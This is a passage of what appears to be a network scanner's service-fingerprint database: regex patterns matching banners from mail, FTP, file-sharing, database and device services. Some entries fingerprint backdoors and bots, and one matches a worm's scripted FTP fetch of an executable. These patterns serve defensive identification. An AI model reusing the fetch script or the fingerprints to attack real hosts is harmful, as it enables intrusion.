Help not supported by this implementation\r\n +220.*?\n214-Commands supported:\r\n214- HELO EHLO MAIL RCPT DATA(?: ETRN)?(?: AUTH)?\r\n214 NOOP QUIT RSET HELP \r\n +220 ([-.\w]+) SMTP version 1\.00;\r\n214 We strongly advise you to study (?:of )?the RFC ?821\.\.\.\r\n +220 ([-\w_.]+) ESMTP\r\n402 Error: command not implemented\r\n +220 smtpd\r\n502 [\d.]+ Error: command not recognized\r\n +220 E?SMTP [^\r\n]*\r\n502 5\.5\.2 Error: command not recognized\r\n +220 ([-\w_.]+) ESMTP \w+\r\n +220 (\S+) E?SMTP Sendmail; +220.*214 SMTP server comments and bug reports to: \ +220.*500 MessageWall: Unrecognized command +220 .*\r\n214-Commands Supported:\r\n214-HELO EHLO AUTH HELP QUIT MAIL NOOP RSET RCPT DATA ETRN VRFY STARTTLS\r\n214-Copyright \(c\) 1995-200\d, Stalker Software, Inc\.\r\n +220 .* ESMTP\r\n214-Gentoo Linux qmail-([-\w.]+)\r\n214 qmail home page: http://pobox\.com/~djb/qmail\.html\r\n +220 ([-\w_.]+) ESMTP\r\n214-The following commands are recognized\r\n214-\tauth\tdata\tehlo\t +220 \[?([-\w_.]+)\]? ESMTP server ready\.\r\n214-Recognized SMTP commands are:\r\n214- HELO EHLO MAIL RCPT DATA RSET\r\n214- AUTH NOOP QUIT HELP VRFY SOML\r\n214 Mail server account is '([-\w_.]+)'\.\r\n| p|Mercury/32 smtpd +220 ([-\w_.]+) Server ESMTP ready at .*\r\n241-\r\n +220 ([-\w_.]+) ESMTP \r\n +220 ([-\w_.]+)\r\n214-Commands supported:\r\n214 AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP\r\n +220 ([-\w_.]+) MailShield SMTP\r\n +220-([-\w_.]+) ESMTP\r\n220-MagicMail Daemon with Built-In Anti-Spam\r\n220 See http://www\.linuxmagic\.com for info\r\n214 qmail home page: http://cr\.yp\.to/qmail\.html, LinuxMagic Support http://www\.linuxmagic\.com\r\n +220 ESMTP Service ready at .*\r\n214-Enter one of the following commands:\r\n214-HELO EHLO MAIL RCPT DATA RSET NOOP QUIT\r\n214 HELP \r\n +220 ([-\w_.]+) ESMTP MTA\r\n214-This is Sendmail version AIX([\d.]+)/([\w.]+)\r\n +220 Service ESMTP Ready\r\n214-This is Sendmail version ([\d.]+) \((P[-\w_.]+)\)\r\n.*future enhancements, contact your HP representative +220 ([-\w_.]+)\r\n502 Command not implemented\r\n +220 ([-\w_.]+) ESMTP[^\r\n]*\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n\r\n +220 ([-\w_.]+) - Ready at .*\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA RSET NOOP QUIT\r\n214- For more info use 'HELP '\.\r\n214 End of HELP info\r\n +220 ESMTP Service ready\r\n500 Command unrecognized\r\n +220 ([-\w_.]+) ESMTP [-\w_.]+ Mail Server ([\d.]+); .*\r\n214-2\.0\.0 This is [-\w_.]+ Mail Server [-\w_.]+\r\n214-2\.0\.0 Topics:\r\n +220 WebMail ESMTP\r\n502 negative vibes\r\n +220 Welcome to the mail server\.\r\n211 DATA EXPN HELO MAIL NOOP QUIT RCPT RSET SAML SEND SOML TURN VRFY\r\n +220 .*\r\n214-This is ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-\w_.]+ \(([-\w_.]+)\)\r\n +220 ([-\w_.]+) Service ready\.\r\n214- Valid commands are:\r\n214- HELO MAIL RCPT DATA RSET QUIT NOOP\r\n214- HELP VRFY\r\n214- Commands not valid are:\r\n214- SEND SOML SAML TURN\r\n214- Mail forwarding handled by this server\.\r\n| p|i5/OS V5R4M0 or OS/400 smtpd +220 ([-\w_.]+) ESMTP server is ready\r\n.*214-Copyright \(c\) 1995-2004, Stalker Software, Inc\.\r\n +220 ([-\w_.]+) ESMTP\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n +220 ([-\w_.]+) ESMTP Generic Ready\r\n502 Command not implemented\.\r\n +220 ([\w_.-]+) ESMTP\r\n214-Run 'info anubis' or visit http://www\.gnu\.org/software/anubis/manual/\r\n214 End of HELP info\r\n +220 SMTP service ready\r\n214-Commands:\r\n214-\tDATA\tRCPT\tMAIL\tQUIT\tRSET\r\n214 \tHELO\tVRFY\tEXPN\tHELP\tNOOP\r\n +220 ready\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA\r\n214- RSET NOOP QUIT HELP\r\n214- VRFY EXPN\r\n214-For more info use HELP \r\n214 End of HELP info\r\n +220 ([-\w_.]+) SMTP; .*\r\n500 Syntax error, command unrecognized\.\r\n +220 ([-\w_.]+) SMTP; .* \+\d{4}\r\n500 Syntax error, command unrecognized\r\n +220 ([-\w_.]+) ESMTP smtprelay service ready\.\r\n214-This is smtprelay\r\n214-Topics: +220 SMTP ESMTP ready at .*0\r\n214-\r\n214 End of HELP info\r\n +220 ([-\w_.]+)\r\n214-HELO domain\r\n214-EHLO domain\r\n214-QUIT\r\n214-MAIL FROM: \[options\]\r\n +220 ([-\w_.]+) ESMTP Ready\r\n211 Help:->Supported Commands: HELO,EHLO,QUIT,HELP,RCPT,MAIL,DATA,RSET,NOOP\r\n +220 ([-\w_.]+) SMTP Relay Service ready\r\n500 Syntax error, command unrecognized\r\n +503 Synchronization error\r\n +(sgi_[-.\w]+\r\n(?:[-.\w]+\r\n)*) +Welcome to Vulnerable Server! Enter HELP for help\.\nValid Commands:\nHELP\nSTATS \[stat_value\]\nRTIME \[rtime_value\]\nLTIME \[ltime_value\]\nSRUN \[srun_value\]\nTRUN \[trun_value\]\nGMON \[gmon_value\]\nGDOG \[gdog_value\]\nKSTET \[kstet_value\]\nGTER \[gter_value\]\nHTER \[hter_value\]\nLTER \[lter_value\]\nKSTAN \[lstan_value\]\nEXIT\n +Commands: HELP VER GET LIST SET INSTCMD LOGIN LOGOUT USERNAME PASSWORD STARTTLS\n +Commands: VER REQ HELP LISTVARS LOGOUT LOGIN PASSWORD LISTRW VARTYPE VARDESC ENUM SET INSTCMD LISTINSTCMD INSTCMDDESC FSD MASTER USERNAME STARTTLS\n +\x05\xff +\x01\x03\0\0........\0\0\0\0........\x9f\xfb.([^\0\x01]+)[\0\x01].*VMware(\d+),(\d+)\x05\x06AFP3\.4\x06AFP3\.3\x06AFP3\.2\x06AFP3\.1\x06AFPX03\x06\tDHCAST128\x04DHX2\x06Recon1\rClient Krb v2\x03GSS\x0fNo User Authent.*\x1b\not_defined_in_RFC4178@please_ignore +AB\0N\x04\x01\x94\0\x06/cccb/\0\0\x02\0\x0cContent-Type\0\0\x17text/html;charset=utf-8\0\0\x0eContent-Length\0\0\x03970\0AB\x03 +\x02\0\0\x01\x03\0U\xd0DSQ\x02\0\0\x01\x03\0U\xd0DSQ +\0\r\nlogin: \^W\^@\^@\^@\^ +\x15\x01\0\0\x08\0\0\0\0\x80\t\x03\x08 +\x16\x03\0\0\*\x02\0\0&\x03.*\x0edropbox-client0 +\x16\x03\0\0\*\x02\0\0&\x03\0.*T[oO][rR]1.*[\x00-\x20]([-\w_.]+) +\x16\x03\0.*Router\([a-zA-Z0-9_-]+).*Sophos EM Certification Manager +\x16\x03\0.*Sophos EM Certification Manager +\0\0MF\xff\xf3MBr\0\0\0\0\x08\x01@\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\0\x81\0\x02PC NETWORK PROGRAM 1\.0\0\x02MICROSOFT NETWORKS 1\.03\0\x02MICROSOFT NETWORKS 3\.0\0\x02LANMAN1\.0\0\x02LM1\.2X002\0\x02Samba\0\x02NT LANMAN 1\.0\0\x02NT LM 0 +\0\0\0\0\0\0\0=r\0\0\0\0\0\0\0\xd8\x97%\x01\x13\0\0\0CONDUCTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19240920 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0h\xd52\t\x10\0\0\0FUNDUS_PG([\w._-]+)\x1b\0\0\0unbekannter Code: 154326376 +\0\0\0\0\0\0\0;r\0\0\0\0\0\0\0XL\)\x01\x11\0\0\0PARATUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 19483736 +\0\0\0\0\0\0\0>r\0\0\0\0\0\0\0\xf8\x926\x01\x14\0\0\0CONSPECTUS_PG([\w._-]+)\x1a\0\0\0unbekannter Code: 20353784 +\xce\xfa\x01\0\x16\0\0\0\0\0\0\x003\xf6\0\0\0\0\0\0\0\0 +\x52\x00\x00\x00\x08\x00\x00\x00\x03 +\0\0\0\x02\0\x03 +\0\0\x01\x01@\n\0\x08\x80\0\x82\0L\xb8..\xff\xff\xff\xff\0\0\0\0 +\0\0\0\x61\xffSMBr\0\0\0\0\x88\x03\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0\x02\x0a\0\x01\0....\xff\xff\x00\x00....\0\x03\0\0\0 +\0\0\0.\xffSMBr\0\0\0\0\x88..\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x06\0..\0\x01\0..\0\0...\0..\0\0 +\x83\0\0\x01\x8f +\0\0\0.\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0.*\W([-_.\w]+)\0 +\0\0\0.\xffSMBr\0\0\0\0\x88\x01.\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0 +\0\0\0M\xffSMBr\0\0\0\0\x98\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\x11\x07\0\x02\x01\0\x01\0\xff\xff\0\0\xff\xff\0\0\0\0\0\0\x01\x02\0\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0WORKGROUP\0 +\0\0\0G\xffSMBr\0\0\0\0\x88\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0@\x06\0\0\x01\0\r\x04\0\0\0\xa0\x05\x02\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\0\0\0.15\0 \x07\x01\[12:1\]\0 \x07\x02\[2003\]\0 \x07\x051\d+\0 INET\0 ([\w._-]+)\0|s p|HP OpenView Omniback/Data Protector +E\0\0\0.S\w+\0C0A000\0Mel protocolo 65363\.19778 no est..? soportado: servidor soporta 1\.0 hasta 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0.S\w+\0C0A000\0Mnicht unterst\xc3\xbctztes Frontend-Protokoll 65363\.19778: Server unterst\xc3\xbctzt 1\.0 bis 3\.0\0Fpostmaster\.c\0L\d+\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1293\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1408\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1445\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1454\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1440\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1497\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1507\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1570\0RProcessStartupPacket\0\0 +E\0\0\0\x9dSFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0F\.\\src\\backend\\postmaster\\postmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x94SFATAL\0C0A000\0MProtocole non support\?e de l'interface 65363\.19778 : le serveur supporte de 1\.0 \?\n3\.0\0Fpostmaster\.c\0L1621\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1666\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1694\0RProcessStartupPacket\0\0 +E\0\0\0\x84SFATAL\0C0A000\0Munsupported frontend protocol 65363\.19778: server supports 1\.0 to 3\.0\0Fpostmaster\.c\0L1695\0RProcessStartupPacket\0\0 +\0\0\0\sequence_number=\[0\] result=\[-2005\] \0 +\0\0\0\x0e\*\*DPTMMSG\*\*\0\0\xf8 +\0\0\0.\xffSMBr\0\0\0\0\x80|s p|Nortel/D-Link router instant setup +\xcd\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\x02\0\0\0\0\0 +\0\0\0\x152999 Invalid command\n\xff\xff\xff\xfc +\0\0\0\x0b3999 No go\n +2[23]0 FTP Server Ready\r\n504 Comand length not supported\.\r\n +\0\0\x02\0\0\0\0\0\0\0\0\0\r\0\0\0\0.......International Business Machines Corp\. +\0\x01\0\x03\0\0\0/Incompatible version number: message discarded\. +\x01\0\x0b\0\0.....\0\0\0\0.*Sun Microsystems, Inc\. +\x01\0\x0b\0\0.*Conectiva Linux \(XFree86 ([\d.]+), patch level (\w+)\) +\0J\x0b\0\0...This copy of X-Win32 will only accept connections from network ([\d.]+)\0\0 +\x01\0\x0b\0\0.....\0\0\0\0.*HDS Network Systems, Inc\. \(([^)]+)\) +\0\0\x02\0\0\0\x01\0\x04\0\0\0\0\r([\w._-]+):\d+\0\x07\0\0\0\0 \x10\0,\x1a\0\0X\.Org Foundation\x01\n\x01\0\x05\0\0\0\xe6\xbf\xc0\xb5\0\0\0\0\0\0\0\0 +GIOP\x01\0\x01\x06\0\0\0\0 +\x80\xf0\x80\x12\0\x01\0\0\0\0\0\0\x20CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01 +RTSP/1\.0 400 Bad Request\r\nServer: AirTunes/([\w._-]+)\r\n\r\n +\0 +default: unknown printer\n +VSE Line Printer Daemon has rejected this request\.\0\0 +no queue to check\n\0 +EXM {EXC \0\x1fcom\.rbnb\.api\.SerializeExceptionMSG \0JUnrecognizable parameter read from input stream\.\nElement read was \x01default}\r\nPNG {}\r\n| p/Ring Buffered Network Bus/ i|http://outlet.creare.com/rbnb/ +\x02rFactorMonitor\x000400\0 +\0\0\0\t51000000\0\0\0\0[^\0] +0%\x02\x01\x01a \n\x010\x04\0\x04\x19anonymous bind disallowed +02\x02\x01\x01a-\n\x01\x02\x04\0\x04&requested protocol version not allowed +0E\x02\x01\x01a@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x84\0\0\0I\x02\x01\x01a\x84\0\0\0@\n\x01\x02\x04\0\x049historical protocol version requested, use LDAPv3 instead +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eanonymous bind +0\x84\0\0\0\x10\x02\x01\x01a\x84\0\0\0\x07\n\x01\0\x04\0\x04\0 +0\.\x02\x01\x01a\)\n\x010\x04\0\x04\"Failed, anonymous bind not allowed +0&\x02\x01\x01a!\n\x01\x02\x04\0\x04\x1aOnly LDAP v3 is supported\. +0\x1a\x02\x01\x01a\x15\n\x01\0\x04\0\x04\x0eBind succeeded + +TNMP\x16\0\0\0TNME\x80\0\xfe\xff..([\w.]+):(\d) +\0\x04\0 +TNMP.\0\0\0TNME.\0\0\0USER.\x07\x04\0\x08\0.{9}\0P\0\x03\0U\0\xff\xff\0.*Desktop Manager ([\d.]+)\0 +ActiveFax Server: Es befinden sich insgesamt +\x03\0\x26 +no entries\n +Host Name: ([-\w_.]+)\nPrinter Device: hp LaserJet (\w+)\nPrinter Status: ([^\r\n]+)\n\0\0 +\x03\0\0\x0b\x06\xd0\0\0\x12.\0 +\x03\0\0\x0b\x06\xd0\0\0\x03.\0 +\x03\0\0\x0e\t\xd0\0\0\0[\x02\xa1]\0\xc0\x01\n +\x03\0\0\x0b\x06\xd0\0\x004\x12\0 +.\0\x01.....\0([^\0]+)\0 +\0\0 +\x74\x4e\x63\x50\0\0\0\x10\x33\x33 +\0\0\0\x01\0\x17\0\x14\0\x06\0\0\0.\0\0\0\0\0\0 +.\0\0\0.\0\0\0\x03\0\0@\x02\x0f\0.*\x03\0\0\0\0\x02\0/\0.\0\0\0\0\0\0\0.*CN=([-.\w ]+)/OU=([-.\w ]+)/OU=([-.\w ]+)/O=([-.\w ]+)|s p/Lotus Domino server/ i|CN=1;OU=2/3;Org=4 +\x02\0\0\0\0\0\0/\0\0\0\0\0\0\0\0\0@\x1f\0\0\0\0\0\0\0\0\0/\0\0\0\x02\0\0@\x02\x0f\0\x01\0=\x05\0\0\0\0\0\0\0\0\0\0\0\0\0\)\0\0\0 +\x18\0\x01\x02Invalid packet length\0 +{\"error\":{\"code\":-32700,\"message\":\"Parse error\.\"},\"id\":null,\"jsonrpc\":\"([\w._-]+)\"} +\x02\x06 +\x01\x01\0\xfd\xce\xfa\x0b\xb0\xa0\0\0\0\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x12 +HTTP/1\.0 400 Bad Request\r\nDate: .*\r\nServer: Boa/([\w._-]+)\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n400 Bad Request\n

400 Bad Request

\nYour client has issued a malformed or illegal request\.\n\n +\0.\0\0\x02\0\0\0.*\(IAGENT = \(AGENT_VERSION = ([\d.]+)\)\(RPC_VERSION = ([\d.]+)\)\) +\0\x20\0\0\x02\0\0\0\x016\0\0\x08\0\x7f\xff\x01\0\0\0\0\x20 +\0.\0\0[\x02\x04]\0\0\0 +\0,\0\0\x04\0\0\0\"\0\0 \(CONNECT_DATA=\(COMMAND=version\)\) +S\xf5\xc6\x1a{ +\0\0\0H\0\0\0\x02.[^\0]*\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\* ACAP \(IMPLEMENTATION \"CommuniGate Pro ACAP (\d[-.\w]+)\"\) +.\0\x01\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0[^\0]\0.*\0\0\0 +\+Welcome to Ability FTP Server \(Admin\)\. \[20500\]\r\n +200 NOD32SS ([\d.]+) \((\d+)\)\r\n + +\x01\xff\0\xff\x01\x1d\0\xfd\0\n\x03\x05A\+ API \(([\d.]+)\) - CCS \(([\d.]+)\)\0 +\x80\x01\0\x80\0\x80\0\0\xe5az\xcb\0\0\0\0J...............\x02\0\x01\0\0<\x01,.......\0...\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\xff\xff\xff\xff\x01\x04\0.\0\x80\x08 +\0`\0\x04\0\0\0\x1810\x000\x000\x00852224\0\0\0\0\0\0\0\0\0\0\0 +MCOP\0\0\0.\0\0\0\x01\0\0\0\x10aRts/MCOP-([\d.]+)\0\0\0\0 +Asterisk Call Manager/([\d.]+)\r\n +Response: Follows\r\nPrivilege: Command\r\n--END COMMAND--\r\n +220 jeem\.mail\.pv ESMTP\r\n +\r\nUser Access Verification\r\n\r\nYour PassWord: +echo o [\d.]+ \d+ >s\r\necho common>> s\r\necho common>> s\r\necho bin>> s\r\necho get m220\.exe +220 Bot Server \(Win32\)\r\n +PWD +=+\n= +RBackdoor ([\d.]+) +220 Windrone Server \(Win32\)\r\n +220 Reptile welcomes you\.\.\r\n +MZ\x90\0\x03\0\0\0\x04\0\0\0\xff\xff\0\0\xb8\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0fn\0\0\xd0\0\0\0\x0e\x1f\xba\x0e\0\xb4\t\xcd!\xb8\x01L\xcd!This program cannot be run in DOS mode\. +220 SSL Connection Established - Loading Protocol\.\.\.\.\r\n +A-311 Death welcome\x001 +\x01\0\0\0 +HTTP/1\.0 401 Authorization Required\r\n.*Server: bitcoin-json-rpc\r\n +0x[0-9a-fA-F]{32}L +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=1 +\[ANGLESTATUS.*\[XYZSTATUS.*\[ZOOMSTATUS.*\[INSTRUMENTSTATUS.*XRAYSON=0 +\\0\0\0\\0\0\x000RAR\0 \0\0.\xe2\x02\0\xc4G\x0f\0\0\0\0\0\0\0\0\0\0\0\0\0 +\x19\0\0\0\0\0\x0f\xbeB!\x012\x02\xd1\x02\x032\x02p\0\x062\x02\x80\0 +BZFS\d\d\d\d\r\n\r\n +ACK\x01 +\x8d\0\0\0\x8d\0\0\0\x100\x81\x89\x02\x81\x81\0.*\x02\x03\x01\0\x01\0 +\x02\x07\x04\0\xe0\0\0\0\0\0\0\0\0\0\0\0\x02\0\0\0\0\0\0\0\x04\x03\x02\x010\0\0\0\0\0\0\0\x01\0\0\0\x01\0\0\0\xe0\0\0\0\0\0\0\0\0\x80\0\0\0\x80\0\0\0hfnapp04\0\0\0\0\0\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\x02\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0HFNAPP04\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0 +\*\x01..\0\x04\0\0\0\x01 +Cirrato Client ([\w._-]+)\0 +200.*Citadel(?:/UX)? +\x7f\x7fICA\0\x7f\x7fICA\0 +.\0\0\0\x81\0\0\0\x01 +\0\0\0\x10ClsBoolVersion 1 +CFMSERV\(1\)\n +Concerto Software\r\n\r\nEnsemblePro SendLog Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +Concerto Software\r\n\r\nContactPro TimeSync Server - Version (\d[-.\w]+)\r\n\r\nEnter Telnet Password\r\n#> +\x10\x06[\x80-\xff].......\x0b\x01([\w._-]+)\0 +Crestron Terminal Protocol Console opened\r\n +\r\nCrestron Terminal Protocol Console Opened\r\n\r\n +\x0f\0\x01\x02 +/usr/sbin/cvs-pserver: line \d+: .*cvs: No such file or directory\n +\d\d:\d\d:\d\d [AP]M \d\d\d\d/\d\d/\d\d\n +\d\d\d\d/\d\d/\d\d \d\d:\d\d:\d\d\r\n +\xaf\x01 +220 ([-.\w]+) dictd ([-.\w/]+) on ([-.+ \w]+) +0000019a[0-9a-f]{402}\r\n +220 DSPAM DLMTP ([\w._-]+) Authentication Required\r\n +\0\0\0\x0c\0\0\0\?\0\0\0\x02 +0 PROTOCOL 2 [23] AGENT,CONSOLE,INSTALL +\?p\xf7/Zq\xa2\xf5\x03.......\xf4\xea.......B +\(m\xe9l@k\xb7\xf5\x03 +\(m\xe9l@k\xb3\xf7\x1e\xa5 +\(m\xe9l@k\xb1\xf1\x15\xa5 +\?\x008 \xc3p EFTSRV1 ([\d.]+) +\x00\x00\x03\x72<\?xml version=\"1\.0\" encoding=\"UTF-8\" standalone=\"no\" \?>\n\n\n \n ([^<]+)\n .*\n \n ([\w._-]+)\n +7\0\0\0~\0\0\0\0\x14\x06\x04\xe8\x99\x02\0\x05\xeb\0\x04\xdf\x92\0\0\n\xd7\xa3p=\n\xd7\x18@\x04\x95\xf1\x01\0\x13\x13EVE-EVE-RELEASE@ccp +Windows NT Version ([\d.]+) build (\d+), \d+ processors? \(.*\)\r\nFingerDW V([\d.]+) - Hummingbird Ltd\.\n +\r\nIntegrated port\r\nPrinter Type: Lexmark T642\r\nPrint Job Status: +Welcome to FreeVCS MSSQL NT Service\r\n +Welcome to FreeVCS DBISAM NT Service\r\n +FB/([\d.]+) PUSH: SERVER_READY ([\w._-]+) (\w+)\n +220 ([-/.+\w]+) FTP server \(SecureTransport (\d[-.\w]+)\) ready\.\r\n +220 3Com 3CDaemon FTP Server Version (\d[-.\w]+)\r\n +220-GuildFTPd FTP Server \(c\) \d\d\d\d(?:-\d\d\d\d)?\r\n220-Version (\d[-.\w]+)\r\n +530 Connection refused, unknown IP address\.\r\n +220 IIS ([\w._-]+) FTP\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\.\r\n +220 ([-.+\w]+) IronPort FTP server \(V([-.\w]+)\) ready\r\n +220 WFTPD (\d[-.\w]+) service \(by Texas Imperial Software\) ready for new user\r\n +220 ([-.+\w]+) FTP server \(Version [\d.]+\+Heimdal (\d[-+.\w ]+)\) ready\.\r\n +500 OOPS: (could not bind listening IPv4 socket)\r\n +500 OOPS: vsftpd: (.*)\r\n +220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220 ([-\w_.]+) running FileZilla Server version (\d[-.\w ]+)\r\n +220.*\r\n220[- ]FileZilla Server version (\d[-.\w ]+)\r\n +220-.*\r\n220-\r\n220 using FileZilla FileZilla Server version ([^\r\n]+)\r\n +220-FileZilla Server\r\n +431 Could not initialize SSL connection\r\n +220 AXIS ([\w._-]+) Network Camera ([\w._-]+ \(\w+ \d+ \d+\)) ready\.\r\n +220 AXIS StorPoint CD E100 CD-ROM Server V([\d.]+) .* ready\.\r\n +220 AXIS (.+) FTP Network Print Server V([-\w_.]+) +220 AXIS (\w+) Network Fixed Dome Camera (.*) ready\.\r\n +220-Cerberus FTP Server Personal Edition\r\n220-UNREGISTERED\r\n +220-Cerberus FTP Server - Personal Edition\r\n220-UNREGISTERED\r\n220-Welcome to Cerberus FTP Server\r\n220 Created by Grant Averett\r\n +220[ -].*FTP server \(lukemftpd (\d[-. \w]+)\) ready\.\r\n +220[ -]Serv-U FTP[ -]Server v([\w._-]+) +220-Serv-U FTP Server for Winsock\r\n +220-FTP Server v([\d.]+) for WinSock ready\. +431 Unable to negotiate secure command connection\.\r\n +220-FTP Server ready\r\n220-Use USER user@host for native FTP proxy\r\n220 Your FTP Session will expire after 300 seconds of inactivity\.\r\n +220 JD FTP Server Ready +220 ([-.\w]+) FTP server \(Version ([-.+\w()]+)\) ready\.\r\n +220 Server \(ProFTPD\) \[([-.\w]+)\]\r\n +220 ProFTPD (\d\S+) Server +220 FTP Server \[([-\w_.]+)\]\r\n +220.*ProFTP[dD].*Server ready +220 ProFTP Server Ready\r\n +220 Welcome @ my\.ftp\.org\r\n +220 .* FTP Server \(ProFTPD ([\d.]+) on Red Hat linux ([\d.]+)\) ready\.\r\n +220 ProFTP-Server auf ([-\w_.]+)\r\n +220.*\r\n220 ProFTPD ([\w._-]+) Server \(ProFTPD\) +220 FTP Server ready\.\r\n +220.*NcFTPd Server +220 ([-\w_.]+) FTP server \(SunOS 5\.([789])\) ready +220 VxWorks FTP server \(VxWorks ?([\d.]+) - Secure NetLinx version \(([\d.]+)\)\) ready\.\r\n| p|AMX NetLinx A/V control system ftpd +220[- ]FTP server ready\.\r\n.*214 Pure-FTPd - http://pureftpd\.org/?\r\n +220---------- Welcome to Pure-FTPd \[privsep\] \[TLS\] ----------\r\n220-You are user number| p/Pure-FTPd/ i|with SSL/TLS +220 ready, dude \(vsFTPd (\d[0-9.]+): beat me, break me\)\r\n +220 TYPSoft FTP Server (\d\S+) ready\.\.\.\r\n +220- Welcome to this Xitami FTP server, running version ([\d\w.]+) of Xitami\. \n You are user number (\d+) of a permitted (\d+) users\.| p/Xitami ftpd/ v/1/ i|2/3 users +220 Service Ready for new User\r\n +220 ([-\w]+) FTP server \(NetWare (v[\d.]+)\) ready\.\r\n +220 ([-.+\w]+) FTP SERVICE ready\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n500 Please enter a command\. Dunno how to interperet empty lines\.\.\.\r\n +220 FTP server \(Hummingbird Ltd\. \(HCLFTPD\) Version ([\d.]+)\) ready\.\r\n +220-\r\n Your connection logged!\r\n220 ([\w_.-]+) FTP server \(NetBSD-ftpd 200\d+\) ready\.\r\n +220 CommuniGate Pro FTP Server ([\d.]+) ready\r\n +(?:220.*\r\n)?220 [Ee]valine FTP server \(Version: Mac OS X +220 WinGate Engine FTP Gateway ready\r\n +220 Welcome to Quick 'n Easy FTP 